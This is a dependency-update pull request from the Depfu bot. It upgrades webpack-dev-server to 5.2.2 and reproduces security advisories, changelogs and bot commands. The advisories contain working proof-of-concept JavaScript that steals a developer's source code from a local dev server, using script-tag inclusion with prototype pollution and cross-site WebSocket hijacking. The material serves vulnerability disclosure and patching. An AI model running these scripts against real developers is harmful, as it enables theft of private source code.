🚨 [security] Update webpack-dev-server 5.0.4 → 5.2.2 (minor)

[depfu]

---

🚨 Your current dependencies have known security vulnerabilities 🚨

This dependency update fixes known security vulnerabilities. Please see the details below and assess their impact carefully. We recommend to merge and deploy this as soon as possible!

---

Here is everything you need to know about this update. Please take a good look at what changed and the test results before merging this pull request.

What changed?

✳️ webpack-dev-server (5.0.4 → 5.2.2) · Repo · Changelog

Security Advisories 🚨

🚨 webpack-dev-server users' source code may be stolen when they access a malicious web site

Summary

Source code may be stolen when you access a malicious web site.

Details

Because the request for classic script by a script tag is not subject to same origin policy, an attacker can inject <script src="http://localhost:8080/main.js"> in their site and run the script. Note that the attacker has to know the port and the output entrypoint script path. Combined with prototype pollution, the attacker can get a reference to the webpack runtime variables.
By using Function::toString against the values in __webpack_modules__, the attacker can get the source code.

PoC

1. Download reproduction.zip and extract it
2. Run npm i
3. Run npx webpack-dev-server
4. Open https://e29c9a88-a242-4fb4-9e64-b24c9d29b35b.pages.dev/
5. You can see the source code output in the document and the devtools console.

The script in the POC site is:

let moduleList
const onHandlerSet = (handler) => {
  console.log('h', handler)
  moduleList = handler.require.m
}
const originalArrayForEach = Array.prototype.forEach

Array.prototype.forEach = function forEach(callback, thisArg) {

callback((handler) => {

onHandlerSet(handler)

})

originalArrayForEach.call(this, callback, thisArg)

Array.prototype.forEach = originalArrayForEach

}
const script = document.createElement('script')

script.src = 'http://localhost:8080/main.js'

script.addEventListener('load', () => {

console.log(moduleList)

for (const key in moduleList) {

const p = document.createElement('p')

const title = document.createElement('strong')

title.textContent = key

const code = document.createElement('code')

code.textContent = moduleList[key].toString()

p.append(title, ':', document.createElement('br'), code)

document.body.appendChild(p)

}

})

document.head.appendChild(script)

This script uses the function generated by renderRequire.

    // The require function
    function __webpack_require__(moduleId) {
        // Check if module is in cache
        var cachedModule = __webpack_module_cache__[moduleId];
        if (cachedModule !== undefined) {
            return cachedModule.exports;
        }
        // Create a new module (and put it into the cache)
        var module = __webpack_module_cache__[moduleId] = {
            // no module.id needed
            // no module.loaded needed
            exports: {}
        };
        // Execute the module function
        var execOptions = {
            id: moduleId,
            module: module,
            factory: __webpack_modules__[moduleId],
            require: __webpack_require__
        };
        __webpack_require__.i.forEach(function(handler) {
            handler(execOptions);
        });
        module = execOptions.module;
        execOptions.factory.call(module.exports, module, module.exports, execOptions.require);
        // Return the exports of the module
        return module.exports;
    }

Especially, it uses the fact that Array::forEach is called for __webpack_require__.i and execOptions contains __webpack_require__.
It uses prototype pollution against Array::forEach to extract __webpack_require__ reference.

Impact

This vulnerability can result in the source code to be stolen for users that uses a predictable port and output path for the entrypoint script.

Old content

Summary

Source code may be stolen when you use output.iife: false and access a malicious web site.

Details

When output.iife: false is set, some global variables for the webpack runtime are declared on the window object (e.g. __webpack_modules__).
Because the request for classic script by a script tag is not subject to same origin policy, an attacker can inject <script src="http://localhost:8080/main.js"> in their site and run the script. Note that the attacker has to know the port and the output entrypoint script path. By running that, the webpack runtime variables will be declared on the window object.
By using Function::toString against the values in __webpack_modules__, the attacker can get the source code.

I pointed out output.iife: false, but if there are other options that makes the webpack runtime variables to be declared on the window object, the same will apply for those cases.

PoC

1. Download reproduction.zip and extract it
2. Run npm i
3. Run npx webpack-dev-server
4. Open https://852aafa3-5f83-44da-9fc6-ea116d0e3035.pages.dev/
5. Open the devtools console.
6. You can see the content of src/index.js and other scripts loaded.

The script in the POC site is:

const script = document.createElement('script')
script.src = 'http://localhost:8080/main.js'
script.addEventListener('load', () => {
    for (const module in window.__webpack_modules__) {
        console.log(`${module}:`, window.__webpack_modules__[module].toString())
    }
})
document.head.appendChild(script)

Impact

This vulnerability can result in the source code to be stolen for users that has output.iife: false option set and uses a predictable port and output path for the entrypoint script.

🚨 webpack-dev-server users' source code may be stolen when they access a malicious web site with non-Chromium based browser

Summary

Source code may be stolen when you access a malicious web site with non-Chromium based browser.

Details

The Origin header is checked to prevent Cross-site WebSocket hijacking from happening which was reported by CVE-2018-14732.
But webpack-dev-server always allows IP address Origin headers.

webpack-dev-server/lib/Server.js

Lines 3113 to 3127 in 55220a8

    <tbody>

    <tr class="border-0">
      <td id="L3114" class="blob-num border-0 px-3 py-0 color-bg-default" data-line-number="3114"></td>
      <td id="LC3114" class="blob-code border-0 px-3 py-0 color-bg-default blob-code-inner js-file-line"> <span class="pl-c">// A note on IPv6 addresses:</span> </td>
    </tr>

    <tr class="border-0">
      <td id="L3115" class="blob-num border-0 px-3 py-0 color-bg-default" data-line-number="3115"></td>
      <td id="LC3115" class="blob-code border-0 px-3 py-0 color-bg-default blob-code-inner js-file-line"> <span class="pl-c">// hostHeader will always contain the brackets denoting</span> </td>
    </tr>

    <tr class="border-0">
      <td id="L3116" class="blob-num border-0 px-3 py-0 color-bg-default" data-line-number="3116"></td>
      <td id="LC3116" class="blob-code border-0 px-3 py-0 color-bg-default blob-code-inner js-file-line"> <span class="pl-c">// an IPv6-address in URLs,</span> </td>
    </tr>

    <tr class="border-0">
      <td id="L3117" class="blob-num border-0 px-3 py-0 color-bg-default" data-line-number="3117"></td>
      <td id="LC3117" class="blob-code border-0 px-3 py-0 color-bg-default blob-code-inner js-file-line"> <span class="pl-c">// these are removed from the hostname in url.parse(),</span> </td>
    </tr>

    <tr class="border-0">
      <td id="L3118" class="blob-num border-0 px-3 py-0 color-bg-default" data-line-number="3118"></td>
      <td id="LC3118" class="blob-code border-0 px-3 py-0 color-bg-default blob-code-inner js-file-line"> <span class="pl-c">// so we have the pure IPv6-address in hostname.</span> </td>
    </tr>

    <tr class="border-0">
      <td id="L3119" class="blob-num border-0 px-3 py-0 color-bg-default" data-line-number="3119"></td>
      <td id="LC3119" class="blob-code border-0 px-3 py-0 color-bg-default blob-code-inner js-file-line"> <span class="pl-c">// For convenience, always allow localhost (hostname === 'localhost')</span> </td>
    </tr>

    <tr class="border-0">
      <td id="L3120" class="blob-num border-0 px-3 py-0 color-bg-default" data-line-number="3120"></td>
      <td id="LC3120" class="blob-code border-0 px-3 py-0 color-bg-default blob-code-inner js-file-line"> <span class="pl-c">// and its subdomains (hostname.endsWith(".localhost")).</span> </td>
    </tr>

    <tr class="border-0">
      <td id="L3121" class="blob-num border-0 px-3 py-0 color-bg-default" data-line-number="3121"></td>
      <td id="LC3121" class="blob-code border-0 px-3 py-0 color-bg-default blob-code-inner js-file-line"> <span class="pl-c">// allow hostname of listening address  (hostname === this.options.host)</span> </td>
    </tr>

    <tr class="border-0">
      <td id="L3122" class="blob-num border-0 px-3 py-0 color-bg-default" data-line-number="3122"></td>
      <td id="LC3122" class="blob-code border-0 px-3 py-0 color-bg-default blob-code-inner js-file-line"> <span class="pl-k">const</span> <span class="pl-s1">isValidHostname</span> <span class="pl-c1">=</span> </td>
    </tr>

    <tr class="border-0">
      <td id="L3123" class="blob-num border-0 px-3 py-0 color-bg-default" data-line-number="3123"></td>
      <td id="LC3123" class="blob-code border-0 px-3 py-0 color-bg-default blob-code-inner js-file-line">   <span class="pl-kos">(</span><span class="pl-s1">hostname</span> <span class="pl-c1">!==</span> <span class="pl-c1">null</span> <span class="pl-c1">&amp;&amp;</span> <span class="pl-s1">ipaddr</span><span class="pl-kos">.</span><span class="pl-c1">IPv4</span><span class="pl-kos">.</span><span class="pl-en">isValid</span><span class="pl-kos">(</span><span class="pl-s1">hostname</span><span class="pl-kos">)</span><span class="pl-kos">)</span> <span class="pl-c1">||</span> </td>
    </tr>

    <tr class="border-0">
      <td id="L3124" class="blob-num border-0 px-3 py-0 color-bg-default" data-line-number="3124"></td>
      <td id="LC3124" class="blob-code border-0 px-3 py-0 color-bg-default blob-code-inner js-file-line">   <span class="pl-kos">(</span><span class="pl-s1">hostname</span> <span class="pl-c1">!==</span> <span class="pl-c1">null</span> <span class="pl-c1">&amp;&amp;</span> <span class="pl-s1">ipaddr</span><span class="pl-kos">.</span><span class="pl-c1">IPv6</span><span class="pl-kos">.</span><span class="pl-en">isValid</span><span class="pl-kos">(</span><span class="pl-s1">hostname</span><span class="pl-kos">)</span><span class="pl-kos">)</span> <span class="pl-c1">||</span> </td>
    </tr>

    <tr class="border-0">
      <td id="L3125" class="blob-num border-0 px-3 py-0 color-bg-default" data-line-number="3125"></td>
      <td id="LC3125" class="blob-code border-0 px-3 py-0 color-bg-default blob-code-inner js-file-line">   <span class="pl-s1">hostname</span> <span class="pl-c1">===</span> <span class="pl-s">"localhost"</span> <span class="pl-c1">||</span> </td>
    </tr>

    <tr class="border-0">
      <td id="L3126" class="blob-num border-0 px-3 py-0 color-bg-default" data-line-number="3126"></td>
      <td id="LC3126" class="blob-code border-0 px-3 py-0 color-bg-default blob-code-inner js-file-line">   <span class="pl-kos">(</span><span class="pl-s1">hostname</span> <span class="pl-c1">!==</span> <span class="pl-c1">null</span> <span class="pl-c1">&amp;&amp;</span> <span class="pl-s1">hostname</span><span class="pl-kos">.</span><span class="pl-en">endsWith</span><span class="pl-kos">(</span><span class="pl-s">".localhost"</span><span class="pl-kos">)</span><span class="pl-kos">)</span> <span class="pl-c1">||</span> </td>
    </tr>

    <tr class="border-0">
      <td id="L3127" class="blob-num border-0 px-3 py-0 color-bg-default" data-line-number="3127"></td>
      <td id="LC3127" class="blob-code border-0 px-3 py-0 color-bg-default blob-code-inner js-file-line">   <span class="pl-s1">hostname</span> <span class="pl-c1">===</span> <span class="pl-smi">this</span><span class="pl-kos">.</span><span class="pl-c1">options</span><span class="pl-kos">.</span><span class="pl-c1">host</span><span class="pl-kos">;</span> </td>
    </tr>
</tbody>

// always allow requests with explicit IPv4 or IPv6-address.

This allows websites that are served on IP addresses to connect WebSocket.
By using the same method described in the article linked from CVE-2018-14732, the attacker get the source code.

related commit: 72efaab (note that checkHost function was only used for Host header to prevent DNS rebinding attacks so this change itself is fine.

This vulnerability does not affect Chrome 94+ (and other Chromium based browsers) users due to the non-HTTPS private access blocking feature.

PoC

1. Download reproduction.zip and extract it
2. Run npm i
3. Run npx webpack-dev-server
4. Open http://{ipaddress}/?target=http://localhost:8080&file=main with a non-Chromium browser (I used Firefox 134.0.1)
5. Edit src/index.js in the extracted directory
6. You can see the content of src/index.js

The script in the POC site is:

window.webpackHotUpdate = (...args) => {
    console.log(...args);
    for (i in args[1]) {
        document.body.innerText = args[1][i].toString() + document.body.innerText
	    console.log(args[1][i])
    }
}
let params = new URLSearchParams(window.location.search);

let target = new URL(params.get('target') || 'http://127.0.0.1:8080');

let file = params.get('file')

let wsProtocol = target.protocol === 'http:' ? 'ws' : 'wss';

let wsPort = target.port;

var currentHash = '';

var currentHash2 = '';

let wsTarget = <span class="pl-s1"><span class="pl-kos">${</span><span class="pl-s1">wsProtocol</span><span class="pl-kos">}</span></span>://<span class="pl-s1"><span class="pl-kos">${</span><span class="pl-s1">target</span><span class="pl-kos">.</span><span class="pl-c1">hostname</span><span class="pl-kos">}</span></span>:<span class="pl-s1"><span class="pl-kos">${</span><span class="pl-s1">wsPort</span><span class="pl-kos">}</span></span>/ws;

ws = new WebSocket(wsTarget);

ws.onmessage = event => {

console.log(event.data);

if (event.data.match('"type":"ok"')) {

s = document.createElement('script');

s.src = <span class="pl-s1"><span class="pl-kos">${</span><span class="pl-s1">target</span><span class="pl-kos">}</span></span><span class="pl-s1"><span class="pl-kos">${</span><span class="pl-s1">file</span><span class="pl-kos">}</span></span>.<span class="pl-s1"><span class="pl-kos">${</span><span class="pl-s1">currentHash2</span><span class="pl-kos">}</span></span>.hot-update.js;

document.body.appendChild(s)

}

r = event.data.match(/"([0-9a-f]{20})"/);

if (r !== null) {

currentHash2 = currentHash;

currentHash = r[1];

console.log(currentHash, currentHash2);

}

}

Impact

This vulnerability can result in the source code to be stolen for users that uses a predictable port and uses a non-Chromium based browser.

Release Notes

5.2.2

5.2.2 (2025-06-03)

Bug Fixes

• "Overlay enabled" false positive (18e72ee)
• do not crush when error is null for runtime errors (#5447) (309991f)
• remove unnecessary header X_TEST (#5451) (64a6124)
• respect the allowedHosts option for cross-origin header check (#5510) (03d1214)

5.2.1

5.2.1 (2025-03-26)

Security

• cross-origin requests are not allowed unless allowed by Access-Control-Allow-Origin header
• requests with an IP addresses in the Origin header are not allowed to connect to WebSocket server unless configured by allowedHosts or it different from the Host header

The above changes may make the dev server not work if you relied on such behavior, but unfortunately they carry security risks, so they were considered as fixes.

Bug Fixes

• prevent overlay for errors caught by React error boundaries (#5431) (8c1abc9)
• take the first network found instead of the last one, this restores the same behavior as 5.0.4 (#5411) (ffd0b86)

5.2.0

5.2.0 (2024-12-11)

Features

• added getClientEntry and getClientHotEntry methods to get clients entries (dc642a8)

Bug Fixes

• speed up initial client bundling (145b5d0)

5.1.0

5.1.0 (2024-09-03)

Features

• add visual progress indicators (a8f40b7)
• added the app option to be Function (by default only with connect compatibility frameworks) (3096148)
• allow the server option to be Function (#5275) (02a1c6d)
• http2 support for connect and connect compatibility frameworks which support HTTP2 (#5267) (6509a3f)

Bug Fixes

• check the platform property to determinate the target (#5269) (c3b532c)
• ipv6 output (#5270) (06005e7)
• replace rimraf with rm (#5162) (1a1561f)
• replace default gateway (#5255) (f5f0902)
• support devServer: false (#5272) (8b341cb)

Does any of this look wrong? Please let us know.

Commits

See the full diff on Github. The new version differs by more commits than we can show here.

---

Depfu will automatically keep this PR conflict-free, as long as you don't add any commits to this branch yourself. You can also trigger a rebase manually by commenting with @depfu rebase.

All Depfu comment commands

@​depfu rebase

Rebases against your default branch and redoes this update

@​depfu recreate

Recreates this PR, overwriting any edits that you've made to it

@​depfu merge

Merges this PR once your tests are passing and conflicts are resolved

@​depfu cancel merge

Cancels automatic merging of this PR

@​depfu close

Closes this PR and deletes the branch

@​depfu reopen

Restores the branch and reopens this PR (if it's closed)

@​depfu pause

Ignores all future updates for this dependency and closes this PR

@​depfu pause [minor|major]

Ignores all future minor/major updates for this dependency and closes this PR

@​depfu resume

Future versions of this dependency will create PRs again (leaves this PR as is)